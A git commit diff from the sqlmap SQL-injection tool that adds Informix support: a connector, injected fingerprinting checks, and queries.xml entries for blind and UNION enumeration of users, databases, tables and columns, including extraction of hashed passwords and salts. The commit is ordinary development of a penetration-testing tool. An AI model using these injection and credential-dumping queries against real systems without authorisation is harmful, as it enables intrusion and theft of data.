Adding initial support for Informix (Issue #552)

2024-11-28 20:43:49 +03:00 · 2016-09-23 12:33:27 +02:00 · 2016-09-23 12:33:27 +02:00 · 1b48ff223d
commit 1b48ff223d
parent 640e605412
17 changed files with 383 additions and 7 deletions
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@ -22,6 +22,7 @@ from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import DB2_ALIASES
 from lib.core.settings import HSQLDB_ALIASES
 from lib.core.settings import INFORMIX_ALIASES
 from lib.utils.sqlalchemy import SQLAlchemy
 from plugins.dbms.mssqlserver import MSSQLServerMap
@ -46,6 +47,8 @@ from plugins.dbms.db2 import DB2Map
 from plugins.dbms.db2.connector import Connector as DB2Conn
 from plugins.dbms.hsqldb import HSQLDBMap
 from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
 from plugins.dbms.informix import InformixMap
 from plugins.dbms.informix.connector import Connector as InformixConn
 def setHandler():
    """
@ -65,6 +68,7 @@ def setHandler():
                  (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
                  (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
                  (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
                  (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
            ]
    _ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@ -486,7 +486,7 @@ class Agent(object):
        @rtype: C{str}
        """
-        prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT \d+)\s+\d+)*"
+        prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT( \d+)?)\s+\d+)*"
        fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
        fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I)
        fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I)
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@ -21,6 +21,7 @@ from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import DB2_ALIASES
 from lib.core.settings import HSQLDB_ALIASES
 from lib.core.settings import INFORMIX_ALIASES
 FIREBIRD_TYPES = {
                    261: "BLOB",
@ -146,8 +147,9 @@ DBMS_DICT = {
                DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
                DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
                DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
-                DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
+                DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
                DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
                DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
            }
 FROM_DUMMY_TABLE = {
@ -156,7 +158,8 @@ FROM_DUMMY_TABLE = {
                        DBMS.FIREBIRD: " FROM RDB$DATABASE",
                        DBMS.MAXDB: " FROM VERSIONS",
                        DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
-                        DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS"
+                        DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS",
                        DBMS.INFORMIX: " FROM SYSMASTER:SYSDUAL"
                   }
 SQL_STATEMENTS = {
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@ -34,6 +34,7 @@ class DBMS:
    SQLITE = "SQLite"
    SYBASE = "Sybase"
    HSQLDB = "HSQLDB"
    INFORMIX = "Informix"
 class DBMS_DIRECTORY_NAME:
    ACCESS = "access"
@ -47,6 +48,7 @@ class DBMS_DIRECTORY_NAME:
    SQLITE = "sqlite"
    SYBASE = "sybase"
    HSQLDB = "hsqldb"
    INFORMIX = "informix"
 class CUSTOM_LOGGING:
    PAYLOAD = 9
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@ -19,7 +19,7 @@ from lib.core.enums import OS
 from lib.core.revision import getRevisionNumber
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.0.9.22"
+VERSION = "1.0.9.23"
 REVISION = getRevisionNumber()
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
--- a/lib/utils/deps.py
+++ b/lib/utils/deps.py
@ -44,6 +44,8 @@ def checkDependencies():
            elif dbmsName == DBMS.HSQLDB:
                import jaydebeapi
                import jpype
            elif dbmsName == DBMS.INFORMIX:
                import ibm_db_dbi
        except ImportError:
            warnMsg = "sqlmap requires '%s' third-party library " % data[1]
            warnMsg += "in order to directly connect to the DBMS "
--- a/plugins/dbms/informix/init.py
+++ b/plugins/dbms/informix/init.py
@ -0,0 +1,34 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 from lib.core.enums import DBMS
 from lib.core.settings import INFORMIX_SYSTEM_DBS
 from lib.core.unescaper import unescaper
 from plugins.dbms.informix.enumeration import Enumeration
 from plugins.dbms.informix.filesystem import Filesystem
 from plugins.dbms.informix.fingerprint import Fingerprint
 from plugins.dbms.informix.syntax import Syntax
 from plugins.dbms.informix.takeover import Takeover
 from plugins.generic.misc import Miscellaneous
 class InformixMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
    """
    This class defines Informix methods
    """
    def __init__(self):
        self.excludeDbsList = INFORMIX_SYSTEM_DBS
        Syntax.__init__(self)
        Fingerprint.__init__(self)
        Enumeration.__init__(self)
        Filesystem.__init__(self)
        Miscellaneous.__init__(self)
        Takeover.__init__(self)
    unescaper[DBMS.INFORMIX] = Syntax.escape
--- a/plugins/dbms/informix/connector.py
+++ b/plugins/dbms/informix/connector.py
@ -0,0 +1,63 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 try:
    import ibm_db_dbi
 except ImportError:
    pass
 import logging
 from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.exception import SqlmapConnectionException
 from plugins.generic.connector import Connector as GenericConnector
 class Connector(GenericConnector):
    """
    Homepage: http://code.google.com/p/ibm-db/
    User guide: http://code.google.com/p/ibm-db/wiki/README
    API: http://www.python.org/dev/peps/pep-0249/
    License: Apache License 2.0
    """
    def __init__(self):
        GenericConnector.__init__(self)
    def connect(self):
        self.initConnection()
        try:
            database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port)
            self.connector = ibm_db_dbi.connect(database, self.user, self.password)
        except ibm_db_dbi.OperationalError, msg:
            raise SqlmapConnectionException(msg)
        self.initCursor()
        self.printConnected()
    def fetchall(self):
        try:
            return self.cursor.fetchall()
        except ibm_db_dbi.ProgrammingError, msg:
            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
            return None
    def execute(self, query):
        try:
            self.cursor.execute(query)
        except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg:
            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
        except ibm_db_dbi.InternalError, msg:
            raise SqlmapConnectionException(msg[1])
        self.connector.commit()
    def select(self, query):
        self.execute(query)
        return self.fetchall()
--- a/plugins/dbms/informix/enumeration.py
+++ b/plugins/dbms/informix/enumeration.py
@ -0,0 +1,14 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 from lib.core.data import logger
 from plugins.generic.enumeration import Enumeration as GenericEnumeration
 class Enumeration(GenericEnumeration):
    def __init__(self):
        GenericEnumeration.__init__(self)
--- a/plugins/dbms/informix/filesystem.py
+++ b/plugins/dbms/informix/filesystem.py
@ -0,0 +1,12 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 from plugins.generic.filesystem import Filesystem as GenericFilesystem
 class Filesystem(GenericFilesystem):
    def __init__(self):
        GenericFilesystem.__init__(self)
--- a/plugins/dbms/informix/fingerprint.py
+++ b/plugins/dbms/informix/fingerprint.py
@ -0,0 +1,107 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import re
 from lib.core.common import Backend
 from lib.core.common import Format
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.session import setDbms
 from lib.core.settings import INFORMIX_ALIASES
 from lib.request import inject
 from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
 class Fingerprint(GenericFingerprint):
    def __init__(self):
        GenericFingerprint.__init__(self, DBMS.INFORMIX)
    def getFingerprint(self):
        value = ""
        wsOsFp = Format.getOs("web server", kb.headersFp)
        if wsOsFp:
            value += "%s\n" % wsOsFp
        if kb.data.banner:
            dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
            if dbmsOsFp:
                value += "%s\n" % dbmsOsFp
        value += "back-end DBMS: "
        if not conf.extensiveFp:
            value += DBMS.INFORMIX
            return value
        actVer = Format.getDbms()
        blank = " " * 15
        value += "active fingerprint: %s" % actVer
        if kb.bannerFp:
            banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
            banVer = Format.getDbms([banVer])
            value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
        htmlErrorFp = Format.getErrorParsedDBMSes()
        if htmlErrorFp:
            value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
        return value
    def checkDbms(self):
        if not conf.extensiveFp and (Backend.isDbmsWithin(INFORMIX_ALIASES) or (conf.dbms or "").lower() in INFORMIX_ALIASES):
            setDbms(DBMS.INFORMIX)
            self.getBanner()
            return True
        infoMsg = "testing %s" % DBMS.INFORMIX
        logger.info(infoMsg)
        result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)")
        if result:
            infoMsg = "confirming %s" % DBMS.INFORMIX
            logger.info(infoMsg)
            result = inject.checkBooleanExpression("(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL")
            if not result:
                warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
                logger.warn(warnMsg)
                return False
            setDbms(DBMS.INFORMIX)
            self.getBanner()
            if not conf.extensiveFp:
                return True
            infoMsg = "actively fingerprinting %s" % DBMS.INFORMIX
            logger.info(infoMsg)
            for version in ("12.1", "11.7", "11.5"):
                output = inject.checkBooleanExpression("EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION,'FULL') LIKE '%%%s%%')" % version)
                if output:
                    Backend.setVersion(version)
                    break
            return True
        else:
            warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
            logger.warn(warnMsg)
            return False
--- a/plugins/dbms/informix/syntax.py
+++ b/plugins/dbms/informix/syntax.py
@ -0,0 +1,37 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import re
 from lib.core.common import randomStr
 from plugins.generic.syntax import Syntax as GenericSyntax
 class Syntax(GenericSyntax):
    def __init__(self):
        GenericSyntax.__init__(self)
    @staticmethod
    def escape(expression, quote=True):
        """
        >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar")
        'SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar'
        """
        def escaper(value):
            return "||".join("CHR(%d)" % ord(_) for _ in value)
        excluded = {}
        for _ in re.findall(r"DBINFO\([^)]+\)", expression):
            excluded[_] = randomStr()
            expression = expression.replace(_, excluded[_])
        retVal = Syntax._escape(expression, quote, escaper)
        for _ in excluded.items():
            retVal = retVal.replace(_[1], _[0])
        return retVal
--- a/plugins/dbms/informix/takeover.py
+++ b/plugins/dbms/informix/takeover.py
@ -0,0 +1,15 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 from plugins.generic.takeover import Takeover as GenericTakeover
 class Takeover(GenericTakeover):
    def __init__(self):
        self.__basedir = None
        self.__datadir = None
        GenericTakeover.__init__(self)
--- a/plugins/generic/databases.py
+++ b/plugins/generic/databases.py
@ -335,7 +335,7 @@ class Databases:
                        query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")
                    elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
                        query = rootQuery.blind.query % index
-                    elif Backend.isDbms(DBMS.HSQLDB):
+                    elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX):
                        query = rootQuery.blind.query % (index, unsafeSQLIdentificatorNaming(db))
                    else:
                        query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index)
@ -656,6 +656,10 @@ class Databases:
                    query = rootQuery.blind.count % (tbl)
                    query += condQuery
                elif Backend.isDbms(DBMS.INFORMIX):
                    query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
                    query += condQuery
                elif Backend.isDbms(DBMS.SQLITE):
                    query = rootQuery.blind.query % tbl
                    value = unArrayizeValue(inject.getValue(query, union=False, error=False))
@ -712,6 +716,10 @@ class Databases:
                        query = rootQuery.blind.query % (tbl)
                        query += condQuery
                        field = None
                    elif Backend.isDbms(DBMS.INFORMIX):
                        query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
                        query += condQuery
                        field = condition
                    query = agent.limitQuery(index, query, field, field)
                    column = unArrayizeValue(inject.getValue(query, union=False, error=False))
--- a/plugins/generic/entries.py
+++ b/plugins/generic/entries.py
@ -110,7 +110,10 @@ class Entries:
                kb.data.cachedColumns = foundData
            try:
-                kb.dumpTable = "%s.%s" % (conf.db, tbl)
+                if Backend.isDbms(DBMS.INFORMIX):
                    kb.dumpTable = "%s:%s" % (conf.db, tbl)
                else:
                    kb.dumpTable = "%s.%s" % (conf.db, tbl)
                if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \
                   or safeSQLIdentificatorNaming(tbl, True) not in \
@ -236,6 +239,8 @@ class Entries:
                        query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl))
                    elif Backend.isDbms(DBMS.MAXDB):
                        query = rootQuery.blind.count % tbl
                    elif Backend.isDbms(DBMS.INFORMIX):
                        query = rootQuery.blind.count % (conf.db, tbl)
                    else:
                        query = rootQuery.blind.count % (conf.db, tbl)
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@ -45,7 +45,7 @@ e60456db5380840a586654344003d4e6  lib/core/readlineng.py
 5ef56abb8671c2ca6ceecb208258e360  lib/core/replication.py
 99a2b496b9d5b546b335653ca801153f  lib/core/revision.py
 7c15dd2777af4dac2c89cab6df17462e  lib/core/session.py
-603f6a62397f96fd9253146b4625473e  lib/core/settings.py
+f707e42739fd5451a37dabd559b26170  lib/core/settings.py
 7af83e4f18cab6dff5e67840eb65be80  lib/core/shell.py
 23657cd7d924e3c6d225719865855827  lib/core/subprocessng.py
 0bc2fae1dec18cdd11954b22358293f2  lib/core/target.py
@ -144,6 +144,13 @@ c9d59b7c60aa0f0b23f920f932547e40  plugins/dbms/hsqldb/fingerprint.py
 d278ad5f1c13fea871ed1120942244d5  plugins/dbms/hsqldb/__init__.py
 d781720e15c23b662bae3098ed470756  plugins/dbms/hsqldb/syntax.py
 2f957281cfe80396f73a3dccc0cb6d45  plugins/dbms/hsqldb/takeover.py
 78917f19ea0750a665094d7dd7778d0c  plugins/dbms/informix/connector.py
 7c6b1ac474274d0edaef377d3aa49bc9  plugins/dbms/informix/enumeration.py
 e8f0f28da98020dce27970a50e10a23b  plugins/dbms/informix/filesystem.py
 6644eea7451bc26dcff598b59c0fa000  plugins/dbms/informix/fingerprint.py
 99a77ad7aa7ca4a4b5981f2fa0d9c616  plugins/dbms/informix/__init__.py
 e96b4721cfc65271a2de948c47474aaa  plugins/dbms/informix/syntax.py
 5f130772d2295ae61140acba894eaceb  plugins/dbms/informix/takeover.py
 cc9c82cfffd8ee9b25ba3af6284f057e  plugins/dbms/__init__.py
 4c8667e8af763ddf82ee314c6681d4e1  plugins/dbms/maxdb/connector.py
 075fd66b8bbabed18aeb304c6c0ef2a2  plugins/dbms/maxdb/enumeration.py
--- a/xml/queries.xml
+++ b/xml/queries.xml
@ -714,4 +714,67 @@
            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
        </search_column>
    </dbms>
    <!-- Informix -->
    <!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_072.htm -->
    <!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sec.doc/ids_am_041.htm -->
    <dbms value="Informix">
        <cast query="RTRIM(TO_CHAR(%s))"/>
        <length query="CHAR_LENGTH(RTRIM(%s))"/>
        <isnull query="NVL(%s,' ')"/>
        <delimiter query="||"/>
        <limit query="SELECT SKIP %d LIMIT 1"/>
        <limitregexp query="\s+SKIP\s+([\d]+)\s*LIMIT\s*([\d]+)"/>
        <limitgroupstart query="1"/>
        <limitgroupstop query="2"/>
        <limitstring query=" LIMIT "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--"/>
        <substring query="SUBSTR((%s),%d,%d)"/>
        <concatenate query="%s||%s"/>
        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSMASTER:SYSDUAL"/>
        <hex query="HEX(%s)"/>
        <!-- http://www.dbforums.com/showthread.php?1660588-select-first-and-union&p=6478613#post6478613 -->
        <inference query="ASCII(SUBSTR((SELECT * FROM (%s)),%d,1))>%d"/>
        <banner query="SELECT DBINFO('VERSION','FULL') FROM SYSMASTER:SYSDUAL"/>
        <current_user query="SELECT USER FROM SYSMASTER:SYSDUAL"/>
        <current_db query="SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL"/>
        <hostname query="SELECT DBINFO('DBHOSTNAME') FROM SYSMASTER:SYSDUAL"/>
        <table_comment/>
        <column_comment/>
        <is_dba query="(SELECT USERTYPE FROM SYSUSERS WHERE USERNAME=USER)='D'"/>
        <users>
            <inband query="SELECT USERNAME FROM SYSUSERS"/>
            <blind query="SELECT SKIP %d LIMIT 1 USERNAME FROM SYSUSERS ORDER BY USERNAME" count="SELECT COUNT(USERNAME) FROM SYSUSERS"/>
        </users>
        <passwords>
            <inband query="SELECT USERNAME,HASHED_PASSWORD,SALT FROM SYSUSER:SYSINTAUTHUSERS" condition="USERNAME"/>
            <blind query="SELECT HASHED_PASSWORD FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'" query2="SELECT SALT FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'"/>
        </passwords>
        <privileges/>
        <roles>
            <inband query="SELECT USERNAME,USERTYPE FROM SYSUSERS" condition="name"/>
            <blind query="SELECT GRANTED_ROLE FROM SYSUSERS WHERE USERNAME='s'"/>
        </roles>
        <dbs>
            <inband query="SELECT NAME FROM SYSMASTER:SYSDATABASES"/>
            <blind query="SELECT SKIP %d LIMIT 1 NAME FROM SYSMASTER:SYSDATABASES ORDER BY NAME" count="SELECT COUNT(NAME) FROM SYSMASTER:SYSDATABASES"/>
        </dbs>
        <tables>
            <inband query="SELECT TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
            <blind query="SELECT SKIP %d LIMIT 1 TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99 ORDER BY TABNAME" count="SELECT COUNT(TABNAME) FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
        </tables>
        <columns>
            <inband query="SELECT COLNAME,COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'" condition="COLNAME"/>
            <blind query="SELECT SKIP %d LIMIT 1 COLNAME FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' ORDER BY COLNAME" query2="SELECT COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' AND COLNAME='%s'" count="SELECT COUNT(COLNAME) FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'"  condition="COLNAME"/>
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s:%s"/>
            <blind query="SELECT SKIP %d LIMIT 1 %s FROM %s:%s" count="SELECT COUNT(*) FROM %s:%s"/>
        </dump_table>
        <search_db/>
        <search_table/>
        <search_column/>
    </dbms>
 </root>